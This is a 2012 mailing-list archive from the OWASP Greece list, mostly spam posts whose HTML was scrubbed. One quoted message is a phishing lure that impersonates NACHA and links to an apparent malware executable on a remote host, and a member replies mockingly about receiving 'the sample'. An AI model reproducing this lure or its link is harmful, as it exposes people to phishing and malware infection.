From owasp-greece at lists.owasp.org  Mon Feb 20 16:04:10 2012
From: owasp-greece at lists.owasp.org (Lenore@Nacha.com)
Date: Mon, 20 Feb 2012 16:04:10 GMT
Subject: [Owasp-greece] owasp-greece@lists.owasp.org Alert ID17327
Message-ID: <201202201604.q1KG4Aj7028449@lists.owasp.org>

An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-greece/attachments/20120220/56a2c5e5/attachment.html>

From athanasioskostopoulos at gmail.com  Mon Feb 20 16:08:41 2012
From: athanasioskostopoulos at gmail.com (Athanasios Kostopoulos)
Date: Mon, 20 Feb 2012 17:08:41 +0100
Subject: [Owasp-greece] owasp-greece@lists.owasp.org Alert ID17327
In-Reply-To: <201202201604.q1KG4Aj7028449@lists.owasp.org>
References: <201202201604.q1KG4Aj7028449@lists.owasp.org>
Message-ID: <CA+aGpV-LaZkq2PxH=fgoSvG4+kGD9eS1pF0xX=nP+ycy63ERTg@mail.gmail.com>

Thanks for the sample, I really had an empty evening :)

On Mon, Feb 20, 2012 at 5:04 PM, Lenore at Nacha.com <
owasp-greece at lists.owasp.org> wrote:

> **
>  Please click the link the NACHA site and update your user
> account:ID653578 <http://rscine.ro/dfMRTR6r/zPxqxHGf.exe>
>  <http://rscine.ro/dfMRTR6r/zPxqxHGf.exe>
>
> _______________________________________________
> Owasp-greece mailing list
> Owasp-greece at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-greece
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-greece/attachments/20120220/e81e81c6/attachment.html>

From owasp-greece at lists.owasp.org  Tue Feb 21 13:26:09 2012
From: owasp-greece at lists.owasp.org (owasp-greece at lists.owasp.org)
Date: Tue, 21 Feb 2012 13:26:09 GMT
Subject: [Owasp-greece] owasp-greece@lists.owasp.org Nacha Alert ID39813
Message-ID: <201202211326.q1LDQ9kd001620@lists.owasp.org>

An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-greece/attachments/20120221/4eabcc6c/attachment.html>

From owasp-greece at lists.owasp.org  Sun Feb 26 12:44:25 2012
From: owasp-greece at lists.owasp.org (owasp-greece at lists.owasp.org)
Date: Sun, 26 Feb 2012 12:44:25 GMT
Subject: [Owasp-greece] owasp-greece@lists.owasp.org Rolex Discount
	ID55818168
Message-ID: <201202261244.q1QCiPqD006817@lists.owasp.org>

An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-greece/attachments/20120226/5886d493/attachment.html>

